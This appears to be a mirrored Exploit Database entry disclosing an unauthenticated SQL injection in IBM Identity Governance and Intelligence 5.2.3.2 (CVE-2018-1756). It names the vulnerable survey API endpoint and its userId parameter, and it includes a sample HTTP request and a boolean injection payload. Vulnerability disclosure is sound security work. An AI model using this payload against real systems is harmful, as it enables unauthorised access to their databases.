IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Mohamed Sayed
  日期： 2018-09-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45392/

• # Exploit Title: [Unauthenticated Remote SQLi]
  # Date: [11/09/2018]
  # Exploit Author: [Mohamed Sayed - From SecureMisr Company]
  # Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883]
  # Version: [IGI 5.2.3.2] (REQUIRED)
  # Tested on: [Windows 10]
  # CVE : [CVE-2018-1756]
  
  Hello ,
  IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi
  The vulnerability enable *remote unauthenticated* attacker to take over the
  server database and affect the confidentiality , integrity and availability
  of the system ,
  
  The vulnerability is in the survey end point API
  /survey/api/config?userId=XXX
  
  The userId parameter value is injected directly to a sql query without
  sensitization nor validation and by exploiting it the attacker will be able
  to gain access on the server database
  
  SAMPLE of Vulnerable HTTP Request
  
  GET /survey/api/config?userId=VUL HTTP/1.1
  Host: HOST_IP
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
  Accept: */*
  Referer: https://HOST_IP
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  
  Payload sample :
  userId=1 'AND 1=1 AND '2'='2